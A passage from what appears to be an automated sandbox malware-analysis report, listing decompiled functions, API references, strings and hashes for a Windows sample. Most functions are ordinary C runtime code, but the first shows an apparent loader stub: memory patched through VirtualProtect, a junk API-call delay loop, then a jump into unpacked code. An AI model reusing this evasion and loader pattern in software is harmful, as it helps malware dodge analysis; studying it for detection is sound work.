				 *0x42dcec = _t9;
				_t10 = 0x64;
				 *0x42dcea = _t10;
				_t11 = 0x6c;
				 *0x42dcee = _t11;
				 *0x42dce2 = _t11;
				_t12 = 0x32;
				 *0x42dce6 = _t12;
				_t13 = 0x65;
				 *0x42dcda = _t13;
				 *0x42dce0 = _t13;
				_t14 = 0x72;
				 *0x42dcdc = _t14;
				E00405A6B(_t32);
				_t24 = 0x184cc;
				do {
					if( *0x42e644 == 0x1833b) {
						__imp__GetVolumePathNameW(L"nulunowuyekufuneyaxesor",  &_v2048, 0);
						FindFirstChangeNotificationW(0, 0, 0);
						GetFileAttributesA(0);
						SetComputerNameA("Basiyixeyifopug saluzoha");
						__imp__SetCalendarInfoW(0, 0, 0, 0);
						GetFileType(0);
						__imp__SetFileShortNameW(0, 0);
					}
					_t24 = _t24 - 1;
				} while (_t24 != 0);
				_t21 =  *0x42dc24; // 0x62f9dc
				 *0x42dccc = _t21;
				 *_t21();
				return 0;
			}

0x00406429
0x00406436
0x00406440
0x00406448
0x0040644b
0x00406451
0x00406454
0x0040645c
0x00406462
0x00406465
0x0040646b
0x0040646e
0x00406474
0x00406477
0x0040647d
0x00406480
0x00406486
0x00406489
0x0040648f
0x00406495
0x00406498
0x0040649e
0x004064a1
0x004064a7
0x004064ad
0x004064ae
0x004064b4
0x004064b9
0x004064c0
0x004064ca
0x004064d7
0x004064e0
0x004064e7
0x004064f2
0x004064fc
0x00406503
0x0040650b
0x0040650b
0x00406511
0x00406511
0x00406514
0x00406519
0x0040651e
0x0040652a

APIs

Part of subcall function 00405A6B: __EH_prolog.LIBCMT ref: 00405A74
Part of subcall function 00405A6B: GlobalAlloc.KERNELBASE(00000000), ref: 00405A98
Part of subcall function 00405A6B: VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 00405AB0
Part of subcall function 00405A6B: GetLastError.KERNEL32 ref: 00405AB8

GetVolumePathNameW.KERNEL32(nulunowuyekufuneyaxesor,00000000,00000000), ref: 004064D7
FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004064E0
GetFileAttributesA.KERNEL32(00000000), ref: 004064E7
SetComputerNameA.KERNEL32(Basiyixeyifopug saluzoha), ref: 004064F2
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004064FC
GetFileType.KERNEL32(00000000), ref: 00406503
SetFileShortNameW.KERNEL32(00000000,00000000), ref: 0040650B

Strings

Basiyixeyifopug saluzoha, xrefs: 004064ED
nulunowuyekufuneyaxesor, xrefs: 004064D2

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: FileName$AllocAttributesCalendarChangeComputerErrorFindFirstGlobalH_prologInfoLastNotificationPathProtectShortTypeVirtualVolume
String ID: Basiyixeyifopug saluzoha$nulunowuyekufuneyaxesor
API String ID: 164344972-2523395033
Opcode ID: d16b5b8b8dce798c8910399fb24713b1cd0e9d9bf659044b153efeb6c29e3b30
Instruction ID: fb966b0e15d71144b0bd22afb04916c9cf462eaa64a8b83c211263f238221873
Opcode Fuzzy Hash: d16b5b8b8dce798c8910399fb24713b1cd0e9d9bf659044b153efeb6c29e3b30
Instruction Fuzzy Hash: A2218E76B55280AAE330CBA2FD09AA63768FF54B20F504437F545D61B0DBB50582CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5A2 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040A5A2(intOrPtr __ecx) {
				void* _t47;
				intOrPtr _t48;
				void* _t53;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_push(0x2c);
				_push(0x417a78);
				E0040C128(_t47, _t54, _t56);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00407063(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00409F6C(__ecx, _t53, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x8c));
				 *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00407108(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0040A6C8(_t48, _t53, _t55, _t57, _t61);
				return E0040C16D( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x0040a5a2
0x0040a5a4
0x0040a5a9
0x0040a5ae
0x0040a5b0
0x0040a5b3
0x0040a5b6
0x0040a5b9
0x0040a5c0
0x0040a5d1
0x0040a5df
0x0040a5ed
0x0040a5f5
0x0040a603
0x0040a609
0x0040a610
0x0040a613
0x0040a629
0x0040a62c
0x0040a6a1
0x0040a6a8
0x0040a6af
0x0040a6bc

APIs

__CreateFrameInfo.LIBCMT ref: 0040A5CA

Part of subcall function 00407063: __getptd.LIBCMT ref: 00407071
Part of subcall function 00407063: __getptd.LIBCMT ref: 0040707F

__getptd.LIBCMT ref: 0040A5D4

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__getptd.LIBCMT ref: 0040A5E2
__getptd.LIBCMT ref: 0040A5F0
__getptd.LIBCMT ref: 0040A5FB
_CallCatchBlock2.LIBCMT ref: 0040A621

Part of subcall function 00407108: __CallSettingFrame@12.LIBCMT ref: 00407154

Part of subcall function 0040A6C8: __getptd.LIBCMT ref: 0040A6D7
Part of subcall function 0040A6C8: __getptd.LIBCMT ref: 0040A6E5

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 8f1d90696a2688ea3936d7946fe7d803b2a0bbc8f3439a3d33c7f88237b36b18
Instruction ID: 7e684faa2fd1f334b094959b8f169ed2d54e211e7372e57f7a86f5eb42b7bb83
Opcode Fuzzy Hash: 8f1d90696a2688ea3936d7946fe7d803b2a0bbc8f3439a3d33c7f88237b36b18
Instruction Fuzzy Hash: 4E110AB1C00309DFDF00EFA5D845AAD77B0FF08314F10856AF894AB292DB399A119F59

Uniqueness

Uniqueness Score: -1.00%

Function 00406B56 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406B56(char _a4) {
				signed int _v16;
				char _v20;
				long _v24;
				signed int _v32;
				void* _v36;
				long _v40;
				void _v60;
				void* __edi;
				void* _t20;
				signed int _t21;
				signed int _t26;
				DWORD* _t27;
				void* _t30;
				signed int _t34;
				void* _t38;

				while(1) {
					_t2 =  &_a4; // 0x405855
					_t20 = E004078D7(_t30, _t38,  *_t2);
					if(_t20 != 0) {
						break;
					}
					_t21 = E00409C75(_a4);
					__eflags = _t21;
					if(_t21 == 0) {
						__eflags =  *0x42e660 & 0x00000001;
						if(( *0x42e660 & 0x00000001) == 0) {
							 *0x42e660 =  *0x42e660 | 0x00000001;
							__eflags =  *0x42e660;
							E00406B3B(0x42e654);
							E00409C4F( *0x42e660, 0x417703);
						}
						E0040588A( &_v16, 0x42e654);
						_push(0x4177a0);
						_push( &_v16);
						L7();
						asm("int3");
						_push(0x42e654);
						_push(_t38);
						_t34 = 8;
						_v36 = memcpy( &_v60, 0x401518, _t34 << 2);
						_t26 = _v16;
						_v32 = _t26;
						__eflags = _t26;
						if(_t26 != 0) {
							__eflags =  *_t26 & 0x00000008;
							if(( *_t26 & 0x00000008) != 0) {
								_v20 = 0x1994000;
							}
						}
						_t27 =  &_v20;
						RaiseException(_v40, _v36, _v24, _t27);
						return _t27;
					} else {
						continue;
					}
					L11:
				}
				return _t20;
				goto L11;
			}

0x00406b6d
0x00406b6d
0x00406b70
0x00406b78
0x00000000
0x00000000
0x00406b63
0x00406b69
0x00406b6b
0x00406b7c
0x00406b88
0x00406b8a
0x00406b8a
0x00406b93
0x00406b9d
0x00406ba2
0x00406ba7
0x00406bac
0x00406bb4
0x00406bb5
0x00406bba
0x00406bc6
0x00406bc7
0x00406bca
0x00406bd5
0x00406bd8
0x00406bdc
0x00406be0
0x00406be2
0x00406be4
0x00406be7
0x00406be9
0x00406be9
0x00406be7
0x00406bf0
0x00406bfd
0x00406c04
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b6b
0x00406b7b
0x00000000

APIs

_malloc.LIBCMT ref: 00406B70

Part of subcall function 004078D7: __FF_MSGBANNER.LIBCMT ref: 004078FA
Part of subcall function 004078D7: __NMSG_WRITE.LIBCMT ref: 00407901
Part of subcall function 004078D7: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,004104F5,00000001,00000001,00000001,?,0040DAD7,00000018,00417BD8,0000000C,0040DB68), ref: 0040794E

std::bad_alloc::bad_alloc.LIBCMT ref: 00406B93

Part of subcall function 00406B3B: std::exception::exception.LIBCMT ref: 00406B47

__CxxThrowException@8.LIBCMT ref: 00406BB5

Strings

UX@, xrefs: 00406B6D
TB, xrefs: 00406B83

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
String ID: TB$UX@
API String ID: 3715980512-2156152108
Opcode ID: f5f13009a3e2b1de24221d6bad4e3344780dabd098660a51c124c6ab0b4c5c10
Instruction ID: e03a47e3d7dbfed10d582903bf367da44c0a492470d6b0e3d614105ffc528273
Opcode Fuzzy Hash: f5f13009a3e2b1de24221d6bad4e3344780dabd098660a51c124c6ab0b4c5c10
Instruction Fuzzy Hash: 5CF0E271A0412866DB187622DC06D5A3BB89B20318B51407FF813F10D2DF7DB952815D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2F1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040A2F1(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;

				_t25 = __edi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00409F6C(_t23, __edx, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E00409F6C(_t23, __edx, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E00409F6C(_t23, __edx, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x417b18);
						E0040C128(_t23, __edi, __esi);
						_t19 =  *((intOrPtr*)(E00409F6C(_t23, __edx, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0040C16D(E0041069C(_t23, _t24, _t25));
					}
				}
			}

0x0040a2f1
0x0040a2f1
0x0040a2fb
0x0040a302
0x0040a321
0x0040a328
0x0040a32f
0x0040a334
0x0040a334
0x0040a334
0x00000000
0x0040a304
0x0040a304
0x0040a309
0x0040a336
0x0040a336
0x0040a339
0x0040a30b
0x0040a310
0x0040aefb
0x0040aefd
0x0040af02
0x0040af0c
0x0040af11
0x0040af13
0x0040af17
0x0040af22
0x0040af22
0x0040af33
0x0040af33
0x0040a309

APIs

__getptd.LIBCMT ref: 0040A30B

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__getptd.LIBCMT ref: 0040A31C
__getptd.LIBCMT ref: 0040A32A

Strings

csm, xrefs: 0040A304
MOC, xrefs: 0040A2FD

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: afda627553e1d3404fb2c680ee2ca1c5e0fbcedafb92ff1583f665337c3a5b1c
Instruction ID: 622605f05806e43214a8a41ef03f34c1d013f3cc9fc1b6c3fd85fef28c091024
Opcode Fuzzy Hash: afda627553e1d3404fb2c680ee2ca1c5e0fbcedafb92ff1583f665337c3a5b1c
Instruction Fuzzy Hash: 11E09A36514304DFDB20AB75C04AB6A3698EB49318F1540B6A9C8D73A3D73CDCA4959B

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECF3 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040ECF3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x417c18);
				E0040C128(__ebx, __edi, __esi);
				_t31 = E00409F6C(__ebx, __edx, _t35);
				_t15 =  *0x42d194; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040DB4D(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x42d098; // 0x21d15f8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x42cc70;
								if(__eflags != 0) {
									_push(_t33);
									E004079A1(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x42d098; // 0x21d15f8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x42d098; // 0x21d15f8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0040ED8E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040CCA3(_t29, 0x20);
				}
				return E0040C16D(_t33);
			}

0x0040ecf3
0x0040ecf3
0x0040ecf3
0x0040ecf3
0x0040ecf5
0x0040ecfa
0x0040ed04
0x0040ed06
0x0040ed0e
0x0040ed2f
0x0040ed35
0x0040ed39
0x0040ed3c
0x0040ed3f
0x0040ed45
0x0040ed47
0x0040ed49
0x0040ed4c
0x0040ed52
0x0040ed54
0x0040ed56
0x0040ed5c
0x0040ed5e
0x0040ed5f
0x0040ed64
0x0040ed5c
0x0040ed54
0x0040ed65
0x0040ed6a
0x0040ed6d
0x0040ed73
0x0040ed77
0x0040ed77
0x0040ed7d
0x0040ed84
0x0040ed16
0x0040ed16
0x0040ed16
0x0040ed1b
0x0040ed1f
0x0040ed24
0x0040ed2c

APIs

__getptd.LIBCMT ref: 0040ECFF

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__amsg_exit.LIBCMT ref: 0040ED1F
__lock.LIBCMT ref: 0040ED2F
InterlockedDecrement.KERNEL32(?), ref: 0040ED4C
InterlockedIncrement.KERNEL32(021D15F8), ref: 0040ED77

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: f597ff586386ee98be70c95fc1552d6985489a0103feaeef2b68afe6ec2927bc
Instruction ID: 298bf980c9c0aec7c7d52094cac1c499a146b192491b880d0050c6e3868dceb6
Opcode Fuzzy Hash: f597ff586386ee98be70c95fc1552d6985489a0103feaeef2b68afe6ec2927bc
Instruction Fuzzy Hash: 75018E31E00622D7D721AB26A84579A7360EF04B29F00053BE914773D1C73C68A28BCD

Uniqueness

Uniqueness Score: -1.00%

Function 004079A1 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E004079A1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x417928);
				_t8 = E0040C128(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0040C16D(_t8);
				}
				if( *0x42f134 != 3) {
					_push(_t23);
					L7:
					if(HeapFree( *0x42eb04, 0, ??) == 0) {
						_t10 = E00407F57();
						 *_t10 = E00407F15(GetLastError());
					}
					goto L9;
				}
				E0040DB4D(__ebx, __edi, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0040DB80(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0040DBB0();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E004079F7();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x004079a1
0x004079a3
0x004079a8
0x004079ad
0x004079b2
0x00407a29
0x00407a2e
0x00407a2e
0x004079bb
0x00407a00
0x00407a01
0x00407a11
0x00407a13
0x00407a26
0x00407a28
0x00000000
0x00407a11
0x004079bf
0x004079c5
0x004079ca
0x004079d0
0x004079d5
0x004079d7
0x004079d8
0x004079d9
0x004079df
0x004079e0
0x004079e7
0x004079f0
0x00000000
0x004079f2
0x004079f2
0x00000000
0x004079f2

APIs

__lock.LIBCMT ref: 004079BF

Part of subcall function 0040DB4D: __mtinitlocknum.LIBCMT ref: 0040DB63
Part of subcall function 0040DB4D: __amsg_exit.LIBCMT ref: 0040DB6F
Part of subcall function 0040DB4D: EnterCriticalSection.KERNEL32(00409F0F,00409F0F,?,0041588A,00000004,00417DC0,0000000C,0041053F,00000001,00409F1E,00000000,00000000,00000000,?,00409F1E,00000001), ref: 0040DB77

___sbh_find_block.LIBCMT ref: 004079CA
___sbh_free_block.LIBCMT ref: 004079D9
HeapFree.KERNEL32(00000000,00000001,00417928,0000000C,0040DB2E,00000000,00417BD8,0000000C,0040DB68,00000001,00409F0F,?,0041588A,00000004,00417DC0,0000000C), ref: 00407A09
GetLastError.KERNEL32(?,0041588A,00000004,00417DC0,0000000C,0041053F,00000001,00409F1E,00000000,00000000,00000000,?,00409F1E,00000001,00000214), ref: 00407A1A

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: c12663648c0d4e2af9016428884d4000b2d59aff5cd47b208b817aec9f7eb85a
Instruction ID: 8f777d082abfc0d878f9bfaaf4c1826c71b29845cb59ede7f12ddd66b922c452
Opcode Fuzzy Hash: c12663648c0d4e2af9016428884d4000b2d59aff5cd47b208b817aec9f7eb85a
Instruction Fuzzy Hash: 89014471E092069AEF20BBB69C06B5F7A649F00764F50053FF504BA1D1CA7CBA458E5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A94F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 21%

			E0040A94F(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				intOrPtr _t19;
				void* _t21;
				void* _t22;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;

				_t26 = __esi;
				_t25 = __edi;
				_t21 = __ebx;
				_t29 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0040A8BD(__ebx, __edi, __esi, _t29);
					_t27 = _t27 + 0x10;
				}
				_t30 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t26);
				}
				E00406DBB(_t22);
				_push( *_t25);
				_push(_a16);
				_push(_a12);
				_push(_t26);
				E0040A33A(_t21, _t24, _t25, _t26, _t30);
				_push(0x100);
				_push(_a24);
				_t19 =  *((intOrPtr*)(_t25 + 4)) + 1;
				_push(_a16);
				 *((intOrPtr*)(_t26 + 8)) = _t19;
				_push(_a8);
				_push(_t26);
				_push(_a4);
				"j,hxzA"();
				if(_t19 != 0) {
					E00406D74(_t19, _t26);
					return _t19;
				}
				return _t19;
			}

0x0040a94f
0x0040a94f
0x0040a94f
0x0040a954
0x0040a958
0x0040a95a
0x0040a95d
0x0040a95e
0x0040a95f
0x0040a962
0x0040a967
0x0040a967
0x0040a96a
0x0040a96e
0x0040a971
0x0040a976
0x0040a973
0x0040a973
0x0040a973
0x0040a979
0x0040a97e
0x0040a980
0x0040a983
0x0040a986
0x0040a987
0x0040a98f
0x0040a994
0x0040a997
0x0040a998
0x0040a99b
0x0040a99e
0x0040a9a4
0x0040a9a5
0x0040a9a8
0x0040a9b2
0x0040a9b6
0x00000000
0x0040a9b6
0x0040a9bc

APIs

___BuildCatchObject.LIBCMT ref: 0040A962

Part of subcall function 0040A8BD: ___BuildCatchObjectHelper.LIBCMT ref: 0040A8F3

_UnwindNestedFrames.LIBCMT ref: 0040A979
___FrameUnwindToState.LIBCMT ref: 0040A987

Strings

csm, xrefs: 0040A95E, 0040A973, 0040A986, 0040A9A4, 0040A9B4

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: f7775c5282b144064f6aa1fbcbd92dd75a2391eadffbc48365066a24746a3b62
Instruction ID: c18afe15dfa004b4b11c55b0fe6cb4d4148c85d4026d47cf0b1876583a05e907
Opcode Fuzzy Hash: f7775c5282b144064f6aa1fbcbd92dd75a2391eadffbc48365066a24746a3b62
Instruction Fuzzy Hash: 32012871100209BBDF126F52CC45EEE3E6AEF08394F058426BD09241A0D73A9972DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004095AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E004095AF() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x4016f8;
					_v28 =  *0x4016f0;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x004095b4
0x004095bc
0x004095d3
0x0040957f
0x00409588
0x00409594
0x00409597
0x0040959a
0x0040959c
0x0040959f
0x004095a4
0x004095ae
0x004095a6
0x004095aa
0x004095aa
0x004095be
0x004095c4
0x004095cc
0x00000000
0x004095ce
0x004095ce
0x004095d2
0x004095d2
0x004095cc

APIs

GetModuleHandleA.KERNEL32(KERNEL32,004068AA), ref: 004095B4
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004095C4

Strings

IsProcessorFeaturePresent, xrefs: 004095BE
KERNEL32, xrefs: 004095AF

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 42ce375bee8a8cf742697974e5cdae8eb36b2f87cd69389d819ec3c053a1e79a
Instruction ID: 420fee4b7b8c9d102a00ce1403d5f9c7b68c6b4b741a890553f7b07840975166
